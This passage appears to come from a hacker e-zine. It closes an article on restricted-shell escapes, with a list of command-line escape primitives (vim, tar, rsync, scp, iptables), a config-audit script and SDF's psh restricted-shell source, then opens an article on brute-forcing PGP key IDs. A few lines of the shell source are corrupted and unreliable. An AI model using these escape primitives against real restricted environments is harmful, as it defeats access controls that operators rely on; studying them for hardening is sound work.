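            if (cut == 0) next
            key = tolower(substr(line, 1, cut - 1))
            val = substr(line, cut)
            sub(/^[ \t=]+/, "", val); sub(/[ \t]+$/, "", val); gsub(/"/, "", val)
            if (key == "permituserenvironment") { print val; found = 1; exit }
        }
        END { if (!found) print "no" }
    ' "$1"
}

# Print variable names in environment file $1 that steer the dynamic linker.
linker_vars_in() {
    awk -F= '
        /^[ \t]*#/ { next }
        /^[ \t]*$/ { next }
        { name = $1; gsub(/[ \t]/, "", name); if (name ~ /^(LD_|DYLD_)/) print name }
    ' "$1"
}

# Report findings for one account; return 1 if there are any.
# Any value other than "no" counts as permissive (pattern lists are not
# evaluated), and linker variables in the file are reported either way.
audit_account() {
    findings=0
    mode=$(permit_user_env "$1")
    case $mode in
        [Nn][Oo]) ;;
        *) echo "$1: PermitUserEnvironment $mode"; findings=1 ;;
    esac
    if [ -f "$2" ]; then
        vars=$(linker_vars_in "$2" | tr '\n' ' ')
        if [ -n "$vars" ]; then
            echo "$2 sets linker variables: $vars"
            findings=1
        fi
    fi
    return "$findings"
}

# Constructed sample inputs (not taken from any real host).
write_samples() {
    cat > "$1/sshd_weak" <<'EOF'
# constructed example
Port 22
PermitUserEnvironment yes
PermitUserEnvironment no
EOF
    cat > "$1/sshd_fixed" <<'EOF'
Port 22
permituserenvironment no
EOF
    cat > "$1/environment" <<'EOF'
LANG=C
LD_PRELOAD=/tmp/wut.so
EOF
}

tmp=$(mktemp -d)
write_samples "$tmp"
audit_account "$tmp/sshd_weak" "$tmp/environment" || echo "-> findings above"
audit_account "$tmp/sshd_fixed" "$tmp/missing" && echo "-> hardened sample is clean"
rm -rf -- "$tmp"
```

On a live host, the output of sshd -T is the authoritative view of the
effective configuration, since it also covers files pulled in by Include.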

--[ Conclusion

As you can hopefully see, setting up a restricted shell in a secure manner
is an almost impossible task. The nature of secure shells involves exposing
an untrusted user to code which was not designed to be trusted. 

While there was not too much as far as technical content in this paper,
hopefully it has still provided you some entertainment, and some ideas you
can use in the future. I definitely encourage you all to play with some
restricted shells as, even if you do not need the functionality, they still
provide a fun free wargame.

Thanks go out to freeshell.org for your interesting wargame levels over the
years, as well as huku for your help with this.

--[ References

1) Restricted shells - Wikipedia -
   https://en.wikipedia.org/wiki/Restricted_shell
2) http://www.freeshell.org
3) http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

--[ Appendix A - Common commands with useful primitives

- vim :: Execution primitive
    :set shell=/bin/bash 
    :shell
- arp -f <file> :: File read primitive
- iptables --modprobe=<cmd> :: Execution primitive
- tar --checkpoint-action=<cmd> :: Execution primitive
- rsync -e <cmd> :: Execution primitive
- scp -F <file> a b: :: File read primitive
- scp -S <command> a b: :: Execution primitive
- lynx 'e' :: File read/write in editor
- lynx ! :: Execute Primitive
- mail "~v" :: Execute primitive

--[ Appendix B - psh Source code 

#!/usr/pkg/bin/pdksh
stty susp '' intr '' quit '' erase '^h'
count=0
ccount=0
export TERM=xterm-color
export SHELL=/dev/null
export LESSSECURE=true
export HISTORY=$HOME/.history
export EDITOR=/usr/pkg/bin/pico
export VISUAL=/usr/pkg/bin/pico
export NNTPSERVER=VALIDATE.TO.ACCESS.USENET
export MYTTY=`tty|cut -d/ -f3,4`
export SMALLTTY=`echo $MYTTY|cut -c4-5`
export MYIP=`echo $SSH_CLIENT|awk '{print $1}'`

if [ -f ${HOME}/.profile ]
then rm -f ${HOME}/.profile
exit 0
fi
if [ -f ${HOME}/.kshrc ]
then rm -f ${HOME}/.kshrc
exit 0
fi

if [ "$MYIP" = "" ]
then MYIP="x.x.x.x"
fi
if [ -f $HOME/.pshrc ]
then BACKSPACE=`grep BACKSPACE $HOME/.pshrc|cut -d= -f2`
if [ "$BACKSPACE" != "" ]
then stty erase $BACKSPACE 1>/dev/null 2>/dev/null
fi
fi

Validate(){
echo
echo "Validation is basically designed to protect us from spammers. There"
echo "are ways you can get validated by an SDF member. For instance if you"
echo "were a student and your professor taught a class here on SDF you"
echo "could gain validation through that class."
echo
echo "If you were referred to SDF by a friend or a current SDF member,"
echo "they may be able to validate your new account for you. You can"
echo "usually find SDF egulars in either 'com' or 'irc'. Be sure to ask"
echo "them to help you."
echo
echo "(continue)\c"
read continue
echo
echo "Validating your account ensures our future! Please do it today."
echo "Remember, you make SDF what it is. Without you, we wouldn't exist."
echo
echo " 1) Get a stamped envelope, a sheet of paper and ONE (1) US Dollar."
echo " 2) Write '$LOGNAME' clearly in the upper left hand corner of the"
echo "envelope."
echo " 3) Fold the donation inside a piece of paper and place inside the"
echo "envelope."
echo " OPTIONAL: Send TWO (2) US Dollars & SASE for an SDF Bumper Sticker."
echo
echo " 4) Seal and mail to: SDF Public Access UNIX System"
echo " Post Office Box 17355"
echo " Seattle WA 98127 USA"
echo
echo "Alternatively you may 'validate' your account via PAYPAL by clicking"
echo "on the"
echo "'DONATE' button at the bottom of the http://sdf.org website. The"
echo "paypal"
echo "minimum is \$3. Please include 'Validate $LOGNAME' in the Payment"
echo "For field."
echo
#echo "We also accept BitCoin for validation:"
echo "17GQEeNNHYPmkdgzHmHXiyMaVfgrhPvGBQ"
echo "We also accept BitCoin - Please type 'bitcoin' for details."
echo
echo "You may also credit the validation fee towards 'arpa' membership"
echo "should"
echo "you decide to join 'arpa' within 30 days of validating your account."
echo
echo "(continue)\c"
read continue
echo
echo "To see what you get as a validated member, type 'user'"
echo "For Lifetime ARPA membership to SDF via paypal, type 'arpa'"
echo "To see a list of UNIX commands you can use *NOW*, type 'unix'"
echo "To view user contributed tutorials, visit http://sdf.org/?tutorials"
echo "US Military Personnel, please type 'mil'"
echo
}

Menu(){

echo "SDF psh Version 8 - *PREVALIDATED SHELL ACCOUNT*"
echo
echo " what - what can I use this account for?"
echo " unix - a listing of UNIX commands available to you NOW"
echo " how - information on increasing membership"
echo " teach - using SDF in a classroom setting"
echo " dialup - information about SDF dialup service"
echo " arpa - about lifetime arpa membership"
echo " bboard - sdf user message boards"
echo " commode - chat with other users online"
echo " ysm - chat on the ICQ network"
echo " bsflite - chat on the AIM network"
echo " msnre - chat on the MSN network"
echo " ttytter - listen to Twitter tweets anonymously"
echo " lynx - browse the WWW textually or access GOPHER"
echo " bksp - set your BACKSPACE key"
echo " faq - frequently asked questions"
echo " software - display software programs installed on the system"
echo " quote - get a real time stock quote"
echo " games - a listing of available games"
echo " thxmoo - connect to the THXMOO"
echo " mud - connect to the SDFmud"
#echo " delme - delete your free account"
echo " validate - gain additional shell access (also try 'user' for"
echo "details)"
echo

}

Move(){
echo "Basic movement in $1:"
echo
echo "j - down (or rotate)"
echo "k - up (or rotate)"
echo "h - left"
echo "l - right"
echo "q or Q to quit"
echo
echo "[RETURN]\c"
read ret
}

case `uname -n` in
ol) /usr/local/bin/maint
kill -9 0 ;;
mx) echo
echo "mx is reserved for mail service only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
sverige) echo
echo "sverige is reserved for MetaARPA members only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
vinland) echo
echo "vinland is reserved for VHOST members only."
echo "Please use 'tty.sdf.org' to connect to SDF."
echo
sleep 5
kill -9 0 ;;
esac

/usr/pkg/bin/expire
#echo "Would you like to VALIDATE your account now? (y/n) \c"
#case `/usr/pkg/bin/getchar` in
# 121|89) echo "YES"
# Validate ; echo "[RETURN]\c";read return;;
# *) echo "NO" ;;
#esac
echo
echo "Please press your BACKSPACE key: \c"
stty raw
dd of=.$$ count=1 1>/dev/null 2>/dev/null
stty -raw
stty erase `head -1 .$$` 2>/dev/null
rm -f .$$
#echo
#echo "Enable Colours: (y/n) \c"
#case `/usr/pkg/bin/getchar` in
# 89|121) COLOR=TRUE
# touch -f $HOME/.color ;;
# *) COLOR=FALSE ;;
#esac
clear
echo
echo "===================================================================="
echo "SDF host uptime report for Seattle WA, Dallas TX (USA) and Germany"
echo " Please use 'tty.sdf.org' for general access"
echo "===================================================================="
echo
/usr/local/bin/ruptime -a
echo "(continue)\c"
read return
/usr/pkg/games/pom
/usr/pkg/bin/phoon
echo "(continue)\c"
read return
/usr/pkg/bin/guestbook -l 50
echo "\nType 'help' for Commands."
echo "Type 'com' to chat with other users."
echo "Type 'ttytter' to listen to Twitter Tweets anonymously."
echo "Type 'mud' to play the SDFmud."
case `url $LOGNAME` in
*.*.*) echo "\nYour website is http://`url ${LOGNAME}|awk '{print $1}'`"
echo "with files in $HOME/html\n" ;;
*) echo "Type 'mkhomepg' to set up your personal website.\n"
esac
case `echo $RANDOM|cut -c1` in
1|2|3|4|5) echo "Did you know you can become a permanent LIFETIME member"
echo "of SDF"
echo "by making a onetime donation of \$36? Type 'arpa' for more info!\n" \
;;
6|7|8|9) echo "Did you know you can validate your account and gain weekend"
echo "IRC access"
echo "by making a donation of \$1 to \$3? Type 'validate' for more"
echo "info!\n" ;;
esac
/usr/pkg/bin/dues -p
#Menu
PROMPT="`uname -n`"
while true
do
if [ ! -d $HOME ]
then echo "You may have become an ARPA member."
echo
echo "The update is now taking place and may require 2 or 3 minutes to"
echo "complete. You will now be logged out. When you reconnect, please"
echo "use ssh to connect to 'tty.sdf.org' for load balancing."
echo
echo "[RETURN]\c"
read return
kill -9 0
fi

if [ -f $HOME/.mailcap ]
then rm -f $HOME/.mailcap
fi
if [ "$COLOR" = "TRUE" ]
OMPT

thene echo "$PROMPT:`pwd`> \c"
fi
read command
arg=`echo ${command}|awk '{print $2,$3,$4,$5,$6}'`

#if [ "$ccount" -gt "6" ]
#then echo "\nPlease 'validate' or join 'arpa' today."
# echo "Your membership ensures our future!!\n"
# ccount=0
#else ccount=`expr $ccount + 1`
#fi
echo "[`date +"%d-%b-%y %H:%M:%S"` $MYIP $MYTTY $PROMPT] $PWD $command" \
2>/dev/null >>$HISTORY
case `echo $command|awk '{print $1}'|tr A-Z a-z` in
tty) tty;;
stty) stty;;
lock) lock;;
ulimit) ulimit;;
uname*) uname `echo ${command}|awk '{print $2}'` ;;
echo*) shift ${command}
echo "${command}" ;;
how) /usr/local/bin/how;;
cal*) /usr/pkg/bin/cal `echo $command|awk '{print $2}'` ;;
what) /usr/local/bin/newbie
;;

passwd*|chfn*|chsh*|maint) /usr/local/bin/passwd ;;
url*) url=`echo $command|awk '{print $2}'`
url $url;;
gopher*) site=`echo $command|awk '{print $2}'`
if [ "$site" = "" ]
then lynx -anonymous -restrictions=all gopher://sdf.lonestar.org
else lynx -anonymous -restrictions=all $site
fi
;;
bksp*) bksp=`echo $command|awk '{print $2}'`
if [ "$bksp" = "" ]
then echo "\nTo set your backspace key, type 'bksp' then press your"
echo "actual key and then press return.\n"
else stty erase $bksp
echo "BACKSPACE=$bksp" > $HOME/.pshrc
fi;;

bitcoin*) /usr/local/bin/bitcoin ;;
sftp*|ftp*) echo "\nPlease 'validate' your account to FTP files to and"
echo "from your SDF account.\n" ;;
tar*|make|cc*|tf*|gcc*|g++*|perl*|python*|ruby*|*configure*|netstat*| \
telnet*|ssh*|rlogin*|screen*|nmap*|wget*)
echo "\nTo use this feature, please join the SDF 'arpa' membership"
echo "ARPA membership is available to you for a one time donation of only"
echo "\$36."
echo
echo "Your membership ensures our future! Type 'arpa' for details.\n"
;;
getdialup*) npa=`echo $command|awk '{print $2}'`
/usr/local/bin/getdialup $npa ;;
setdialup) echo "Please validate your account first. For now you can use"
echo "'getdialup' to find access numbers in your area." ;;
phlog|deskshots|sdfers) echo "Please validate your account first." ;;
dialup) /usr/local/bin/dialup ;;
games) /usr/local/bin/games ;;
mud) /usr/pkg/bin/mud ;;
war) /sys/sdf/bin/war ;;
warsetup) /sys/sdf/bin/warsetup ;;
thxmoo) /usr/pkg/bin/thxmoo ;;
bj) /usr/pkg/games/bj;;
lander) /usr/pkg/games/lander;;
othello) /usr/pkg/games/othello;;
advent) /usr/pkg/games/advent;;
zork) /usr/pkg/games/advent;;
tttt) /usr/pkg/games/tttt;;
moon) /usr/pkg/bin/moon-buggy;;
tetrinet) if [ "$LINES" -lt "50" ]
then echo "% tetrinet requires your TTY to be at least 50 lines."
sleep 2
fi
tetrinet $LOGNAME tetrinet.sdf.org
;;
tess) /usr/pkg/games/tess;;
c4) /usr/pkg/games/c4;;
ski) /usr/pkg/games/ski;;
knight) /usr/pkg/games/knight;;
suicide) /usr/pkg/games/suicide;;
dinkum) /usr/pkg/games/dinkum;;
aybabtu) /usr/local/bin/aybabtu;;
barnacle) /usr/pkg/bin/barnacle;;
invaders) /usr/pkg/games/invaders
stty sane ;;
life) /usr/pkg/bin/life /usr/pkg/share/life/tiny.life ;;
order) echo "Please validate your account first.";;
ysm) /usr/pkg/bin/ysm;;
micq) /usr/pkg/bin/rmicq;;
bsflite) /usr/pkg/bin/bsflite;;
msnre) /usr/pkg/bin/msnre;;
dopewars) dopewars;;
zombies) Move $command
/usr/pkg/bin/zombies;;
snake) Move $command
/usr/pkg/games/snake;;
wanderer) Move $command
/usr/pkg/games/wand;;
worm) Move $command
/usr/pkg/games/worm;;
greed) Move $command
/usr/pkg/games/greed;;
tetris) Move $command
/usr/pkg/games/tetris;;
sokoban) Move $command
/usr/pkg/games/sokoban;;
robots) Move $command
/usr/pkg/games/robots;;
torus) Move $command
/usr/pkg/games/torus;;
mazewar) /usr/local/bin/mazewar;;
mdg) /usr/local/bin/mdg
if [ "$?" != "0" ]
then echo "\nMDG might not be running at the moment"
echo "Please try again later."
fi;;
dict*) args=`echo $command|awk '{print $2}'`
dict $args
;;
quote*) args=`echo $command|awk '{print $2}'`
quote $args
;;
cal*) args=`echo $command|awk '{print $2}'`
cal $args
;;
domains) /usr/local/bin/domains ;;
unix) unix ;;
linux) linux;;
dig*) domain=`echo $command|awk '{print $2" "$3" "$4" "$5" "$6" "$7" "$8}'`
dig $domain
;;
host*) domain=`echo $command|awk '{print $2" "$3" "$4" "$5" "$6" "$7" \
"$8}'`
host $domain
;;
geoip*) domain=`echo $command|awk '{print $2}'`
geoip $domain
;;
whois*) domain=`echo $command|awk '{print $2}'`
jwhois $domain
;;
nslookup*) domain=`echo $command|awk '{print $2}'`
nslookup $domain
;;
pkg_info) pkg_info 2>/dev/null|sort|more ;;
lynx*restrict*) echo $command|mailx -s "$LOGNAME" smj;;
lynx*) url=`echo $command|awk '{print $2}'`
if [ "$url" = "" ]
then lynx -anonymous -restrictions=all http://sdf.lonestar.org
else case $url in
http:*) ;;
*) url="http://$url" ;;
esac
lynx -anonymous -restrictions=all $url
fi
;;

edit*|vi*|pico*|emacs*) file=`echo $command|awk '{print $2}'`
if [ "$file" = "" ]
then echo "usage: edit {file}"
else case $file in
*../*|*.kshrc*|*.bashrc*|*.pshrc*|*.muttrc*|*.telnet*|*.mailcap*| \
*.forward*|*.plan*|*.cfg*|*.history*) echo "usage: edit {file}";;
*) /usr/pkg/bin/pico -t -b -o $HOME $PWD/$file ;;
esac
fi
;;
man*) man `echo $command|awk '{print $2}'`;;
rm*) target=`echo $command|awk '{print $2}'`
if [ "`echo $command|awk '{print $3}'`" != "" ] || [ "$target" = "" ]
then echo "usage: rm {filename}"
else case $target in
*.history*|*psh*|*.hushlogin*) echo "Can't remove $target";;
*) if [ -d $target ]
then rm -rf $target
else rm $target
fi;;
esac
fi;;
mv*) oldname=`echo $command|awk '{print $2}'`
newname=`echo $command|awk '{print $3}'`
if [ "`echo $command|awk '{print $4}'`" != "" ] || [ "$oldname" = "" ] || \
 [ "$newname" = "" ]
then echo "usage: mv {oldfile} {newfile}"
else case $oldname$newname in
*.muttc*|*.kshrc*|*.mailcap*|*.telnet*|*.plan*|*html*|*.forward*| \
*.history*|*psh*|*.hushlogin*|*.cfg*) echo "Cant move $oldname to $newname";;
*) mv $oldname $newname ;;
esac
fi;;
ping*) /sbin/ping -c5 `echo $command|awk '{print $2}'`;;
teach) cat ~ftp/pub/sdf/faq/TEACH/01;;
traceroute*) traceroute `echo $command|awk '{print $2}'` & ;;
games) games;;
disk) disk;;
df*) df `echo $command|awk '{print $2}'` ;;
oneliner) /usr/pkg/bin/oneliner;;
rogue) /usr/pkg/games/rogue ;;
hack) /usr/pkg/games/hack ;;
nethack) /usr/pkg/bin/nethack ;;
hunt*) echo
echo "hunt commands:"
echo
echo "j - down"
echo "k - up"
echo "h - right"
echo "l - right"
echo "1 - gun"
echo "2 - grenade"
echo "3 - bomb"
echo "q - quit"
echo
echo "the shift key plus j,k,h or l changes direction"
echo
/usr/pkg/games/hunt `echo $command|awk '{print $2}'`;;
upload) echo "press CTRL-X several times to abort."
lrz -y;;
mkdir) directory=`echo $command|awk '{print $2}'`
case $directory in
*html*|*.plan*) echo "usage: mkdir {name}";;
*) mkdir $directory;;
esac;;
#mkhomepg*|mkhome*) mkhomepg `echo $command|awk '{print $2}'`;;
mkhomepg*|mkhome*) echo "mkhomepg has been temporarily disabled for"
echo "prevalidated users." ;;

vhost) echo
echo " As a lifetime ARPA member, you can increase your membership level"
echo " so that you may virtually host your own domain name on SDF. This"
echo " includes DNS, mail service and virtual webhosting. For more info"
echo " check out the FAQ: file"
echo ;;
help) Menu;;
profiles) /usr/pkg/bin/profiles ;;
#freeirc) echo "% 'freeirc' is available to ALL validated users from"
# echo "Friday 23:59:59"
# echo " through Monday 00:00:01 UTC. Please 'validate' your account"
# echo "today!" ;;
user) echo "\nValidated users (\$1.00 or more) have immediate access to:\n"
echo " 200mb total (home, web, mail & gopher)"
echo " incoming file transfers via ftp or sftp"
echo " elm, pine, mutt, mailx, rmail, pop3, gopher"
echo " bash, ash, ksh, tcsh, rc, zsh, tclsh"
echo " your URL http://$LOGNAME.freeshell.org"
echo " limited cgi execution (shell scripts)"
echo " icq, aim, talk, commode, bboard"
echo " dialup ppp/shell access in the US and Canada"
echo " USENET and ClariNET read/post access"
echo " freeirc on Saturdays and Sundays"
echo " hundreds of UNIX utilities"
echo
echo "The purpose of the prevalidated account is to help newusers"
echo "learn about the UNIX system. Type 'unix' to see what UNIX"
echo "commands are available to you right now. You can validate"
echo "your account today! type 'validate' to validate\n";;
env) env;;
set) set;;
#delme) delme;;
bboard) /usr/pkg/bin/bboard;;
eggdrop*) echo "% eggdrop is available to MetaARPA members only" ;;
psybnc*) echo "% psybnc is available to MetaARPA members only" ;;
arpa|join|member) arpa;;
auction) auction;;
cat*|more*|less*) file=`echo $command|awk '{print $2}'`
case $file in
*psh*) file="" ;;
*random*|*null*|*zero*) echo "% Ja tvoi sluga ja tvoi rabotnik";file="" ;;
esac
if [ "$file" = "" ]
then echo "usage: cat {filename}"
else if [ "`wc -l $file|awk '{print $1}'`" -ge "500" ]
then tail -500 $file
else cat $file
fi
fi;;
software*) /usr/local/bin/software `echo $command|awk '{print $2}'` ;;
cd*) cd `echo $command|awk '{print $2}'`;;
finger*) user=`echo $command|awk '{print $2}'`
case ${user} in
*-*) user=root ;;
esac
size=`ruptime -a|awk 'END {print $1}'`
if [ "$user" = "" ]
then echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)"
else finger -m $user
fi ;;
date) date ;;
whereis*) whereis `echo $command|awk '{print $2}'`;;
locate*) locate `echo $command|awk '{print $2}'` ;;
whoami*) /usr/bin/whoami ;;
who|w|ps*|last*)
size=`ruptime -a|awk 'END {print $1}'`
echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)" ;;
uptime|ruptime*) ruptime -a;;
chmod*) chmod `echo $command|awk '{print $2" "$3}'` ;;
ls*|ll*|dir*) if [ "$COLOR" = "TRUE" ]
then /usr/pkg/bin/colorls -a `echo $command|awk '{print $2}'|tr R r`
else ls -a `echo $command|awk '{print $2}'|tr R r`
fi ;;
sl*) /usr/pkg/bin/sl ;;
pwd) pwd;;
msg) msg ;;
# ps*) ps `echo $command|awk '{print $2}'` ;;
validate) Validate ;;
mil) /usr/local/bin/mil ;;
why) echo
echo "It didn't used to be this way .. but you must understand that your"
echo "small token of trust builds a better SDF for all of us:"
echo
echo "Due to the increased number of security and spam attacks, we are now"
echo "asking that you send ONE US Dollar (or 5 EURO note) as a token of"
echo "your sincerity in becoming a longterm member of our community. It is"
echo "unfortunate that the net has become filled with people whose daily"
echo "goal in life is to terriorize others online. We believe that asking"
echo "for ONE US Dollar would not present a burden"
echo "to anyone in the world. We hope to keep SDF a safe and secure haven"
echo "for you and other shell users. To get an SDF bumper sticker, send in"
echo "TWO US Dollars and a SASE (Self-Addressed Stamped Envelope). Please"
echo "include your username."
echo
echo " SDF public access UNIX system"
echo " Post Office Box 17355"
echo " Seattle WA 98127 USA"
echo;;
w*) size=`ruptime -a|awk 'END {print $1}'`
echo "You are on `uname -n` among $size users. ('validate' to see"
echo "usernames)" ;;

alpine*|pine*|mail*|mutt*|elm*) case `echo $command|awk '{print $2}'` in
-*) echo "unknown mail flag." ;;
*) mutt -F /sys/pkg/etc/rmuttrc ;;
esac;;
*irc*|bitchx*|irssi*|epic*|freeirc*)
#tetrinet $LOGNAME tetrinet.sdf.org ;;
echo "-=- Basic IRC Commands -=-"
echo
echo "/list - List channels"
echo "/join #channel - Join a channel"
echo "/list #channel - Leave a channel"
echo "/msg nick msg - Send a private message"
echo "/who - Who is on"
echo "/quit - Quit IRC"
echo
echo "-(continue)-\c"
read ret
/usr/pkg/bin/oirc -p 7000 ${LOGNAME} irc.sdf.org
#/usr/pkg/bin/oirc -p 6667 ${LOGNAME} irc.sdf.org
echo ;;

com|chat|commode) \
room=`/usr/pkg/bin/comwho|head -3|tail -1|awk '{print $1}'`
echo "ROOMNAME=$room" > $HOME/.comrc
/usr/pkg/bin/com ;;
pcom|pcommode) room=`/usr/pkg/bin/pcomwho|head -3|tail -1|awk '{print $1}'`
echo "ROOMNAME=$room" > $HOME/.comrc
/usr/pkg/bin/pcom ;;
ttytter*|twitter*) echo "% Twitter username (or [RETURN] for anonymous):\c"
read tweet
if [ "$tweet" = "" ]
then echo "% Logging in anonymously"
/usr/local/bin/ttytter -anonymous
else /usr/local/bin/ttytter -user=$tweet
fi ;;
w2k) /usr/local/bin/w2k ;;
mkgopher) mkgopher;;
faq) faq;;
clear) clear;;
usenet|trn*|tin*|slrn*|nn*|rn*) echo "% USENET is available to validated"
echo "users." ;;
die) echo "you has failed."
sleep 4
exit 0 ;;
logout|leave|bye|quit|exit|escape|terminate|cease|logoff|end)
clear
#echo "Would you like to remove your account from our system? (y/n) \c"
#read ans
# case $ans in
# y*|Y*) delme ;;
# *) echo "% '$LOGNAME' will not be deleted." ;;
# esac
echo "Good Bye from the S D F - 1 .."
echo
echo "Please 'validate' or join 'arpa' soon."
echo "Your support is appreciated!"
echo
echo "Thank you!"
sleep 8
exit 0;;
uinfo|expire) uinfo;expire ;;
dues) /usr/pkg/bin/dues ${arg} ;;
#helpdesk) /usr/pkg/bin/helpdesk ;;
guestbook) /usr/pkg/bin/guestbook ;;
id*) /usr/bin/id ${arg} ;;
nospam) echo "You must be validated to use this feature."
;;
*) if [ "$command" != "" ]
then echo "psh: $command: not found - try 'help' for commands"
else if [ "$count" -gt "20" ]
then exit 0
else count=`expr $count + 1`
fi
fi;;
esac
doneecho "


|=[ 0x04 ]=---=[ Personalized PGP Key IDs - f1los0tt1l3 ]=---------------=|


|=-----------------------------------------------------------------------=|
|=-----------=[ Personalized PGP Key IDs for fun and profit ]=-----------=|
|=-----------------------------------------------------------------------=|
|=---------------------------=[ f1los0tt1l3 ]=---------------------------=|
|=-----------------------------------------------------------------------=|


---[ Contents

  1 - Introduction
   1.1 - Prior work
  2 - The spec
  3 - The attack
   3.1 - Preparation
   3.2 - The crash
    3.2.1 - Runtime stats
   3.3 - The patch
  4 - Conclusion
  5 - References
  6 - Code

---[ 1 - Introduction

Everybody should be allowed to have his (or someone's) own PGP key ID. Who
doesn't want his PGP key to match his favorite hex nickname or his
target's key for some cheap social engineering? I certainly do, so I
started researching how they are derived and if they could be bruteforced.

Note: when we speak about key IDs here we mean the 4-byte short ones that
everybody loves to use. However, given enough processing power (or maybe a
SHA1 ASIC|preimage attack) the process can obviously scale to any key ID
length.

-----[ 1.1 - Prior work

GIYF, right? Well, a couple people tried this and lived to tell the tale
(or, well, decided to make it public) but none of them permitted me to get
a 4096 bit RSA key as I wanted it.

In May 2010, halfdog posted on full-disclosure [1] some Java code that
worked on DSA keys. Not exactly fast or customizable, but hey, it was 3
years ago.

Then, in Dec 2011, Asheesh, a Debian dev particularly fond of his key ID,
found a way to create a new RSA 4096 key with that ID (and a bug in GnuPG
handling of duplicate keys) [2]. He highlighted the disruptive potential
of that and decided not to release the code. Bummer.

But the keyservers carry even older evidence (even if one shouldn't trust
the key creation field, especially on these keys): the first example of
custom IDs I could find is

    pub  1024R/A69AB99CDEADBEEF 1995-09-28

that actually employs an old packet type.

So we are not doing anything truly new, but there's still not a public
method to get an arbitrary key with an arbitrary key ID.

---[ 2 - The spec

So, let's get our hands dirty: grab the OpenPGP spec, RFC 4880 [3], and
look up how those key IDs are derived [RFC 4880 - 12.2].

--------------[ RFC 4880 - 12.2.  Key IDs and Fingerprints ]---------------

   For a V3 key, the eight-octet Key ID consists of the low 64 bits of
   the public modulus of the RSA key.

---------------------------------------------------------------------------

Woah, that easy? No, it's not. Version 3 keys are deprecated [RFC 4880 -
5.5.2], for a bad reason - key ID collisions, ahem - and a good reason -
MD5. So, as we don't want to build our new shiny RSA 4096 on MD5, let's
move on to V4 keys.

--------------[ RFC 4880 - 12.2.  Key IDs and Fingerprints ]---------------

   A V4 fingerprint is the 160-bit SHA-1 hash of the octet 0x99,
   followed by the two-octet packet length, followed by the entire
   Public-Key packet starting with the version field.  The Key ID is the
   low-order 64 bits of the fingerprint.

---------------------------------------------------------------------------

Great, so what's in a Public-Key packet?

-------------[ RFC 4880 - 5.5.2.  Public-Key Packet Formats ]--------------

   A version 4 packet contains:

     - A one-octet version number (4).

     - A four-octet number denoting the time that the key was created.

     - A one-octet number denoting the public-key algorithm of this key.

     - A series of multiprecision integers comprising the key material.

---------------------------------------------------------------------------

Note: numbers are big-endian [RFC 4880 - 3.1]

So the variable parts are the creation timestamp and the key material. The
key material is a bunch of algorithm-specific MPIs [RFC 4880 - 3.2] which
can't be tampered with without changing their value.

One might also try to add garbage to the packet, but implementations strip
it. Bummer.
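
As an added illustration (not the article's crash.py or patch.py), the
Python below builds and parses a V4 RSA public-key packet body as quoted
from RFC 4880 above, derives the fingerprint and key IDs, and groups a list
of fingerprints by short ID so that collisions show up. The toy modulus
3233, the third fingerprint and all function names are constructed for the
example; the two timestamps and the other two fingerprints are the ones
printed in section 3.2 of this article.

```python
import hashlib
import struct

RSA = 1  # public-key algorithm ID for RSA (RFC 4880, section 9.1)


def mpi(value):
    """RFC 4880 3.2: two-octet bit count, then the big-endian magnitude."""
    bits = value.bit_length()
    return struct.pack(">H", bits) + value.to_bytes((bits + 7) // 8, "big")


def v4_rsa_pubkey_body(created, n, e):
    """Version (4), creation time, algorithm, then the MPIs n and e."""
    return struct.pack(">BIB", 4, created, RSA) + mpi(n) + mpi(e)


def parse_v4_pubkey_body(body):
    """Return (created, algorithm, [MPI values]); reject malformed input."""
    if len(body) < 6:
        raise ValueError("truncated public-key packet")
    version, created, algo = struct.unpack_from(">BIB", body, 0)
    if version != 4:
        raise ValueError("not a version 4 public-key packet")
    mpis, offset = [], 6
    while offset < len(body):
        if offset + 2 > len(body):
            raise ValueError("truncated MPI length")
        (bits,) = struct.unpack_from(">H", body, offset)
        size = (bits + 7) // 8
        offset += 2
        if offset + size > len(body):
            raise ValueError("truncated MPI value")
        mpis.append(int.from_bytes(body[offset:offset + size], "big"))
        offset += size
    return created, algo, mpis


def v4_fingerprint(body):
    """SHA-1 over 0x99, the two-octet body length, and the packet body."""
    if len(body) > 0xFFFF:
        raise ValueError("packet body too long for a two-octet length")
    return hashlib.sha1(b"\x99" + struct.pack(">H", len(body)) + body).digest()


def key_ids(fingerprint):
    """(long, short) key IDs: low-order 64 and 32 bits of the fingerprint."""
    return fingerprint[-8:].hex(), fingerprint[-4:].hex()


def short_id_collisions(fingerprints_hex):
    """Map each short ID shared by more than one fingerprint to those keys."""
    groups = {}
    for fpr in fingerprints_hex:
        fpr = fpr.replace(" ", "").lower()
        if len(fpr) != 40:
            raise ValueError("expected a 160-bit fingerprint in hex")
        groups.setdefault(fpr[-8:], set()).add(fpr)
    return {sid: sorted(f) for sid, f in groups.items() if len(f) > 1}


# Constructed toy key material (far too small to be a real key).
TOY_N, TOY_E = 3233, 65537
# Same key material, two different creation times.
BODY_A = v4_rsa_pubkey_body(0x512187C9, TOY_N, TOY_E)
BODY_B = v4_rsa_pubkey_body(0x1B550652, TOY_N, TOY_E)

KEYRING = [
    "9b179a2af2f8a744b2214de4eec578f57e61d52a",  # from section 3.2
    "d8efd70f8479432e9158ac27eb56af7c42424242",  # from section 3.2
    "0123456789abcdef0123456789abcdef42424242",  # constructed
]

if __name__ == "__main__":
    for body in (BODY_A, BODY_B):
        fpr = v4_fingerprint(body)
        print(parse_v4_pubkey_body(body), fpr.hex(), key_ids(fpr))
    print(short_id_collisions(KEYRING))
```

Two keys are the same key only if all 160 bits of the fingerprint match;
any entry returned by short_id_collisions() marks a short ID that can no
longer be used to tell keys apart.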

---[ 3 - The attack

Great, we know what constitutes the key ID, and we know that we can tamper
with the key creation value and/or with the RSA/DSA/Elgamal parameters. I
decided to only loop through the key creation field for a simple reason: I
don't trust a crappy tool written by me with RSA primes selection, in
particular in a scenario like this where a lot of different primes are
needed, as skews can lead to disastrous consequences [4].

After all, entropy usage couldn't be optimized much and at least this way
we have the peace of mind of GnuPG generated keys.

So we will simply build a bruteforce on the key creation timestamp value.

-----[ 3.1 - Preparation

Ok, let's dive in. First of all fence your GnuPG env, to avoid cluttering
or damaging your own.

    $ mkdir -m 700 GNUPGHOME && export GNUPGHOME=`pwd`/GNUPGHOME

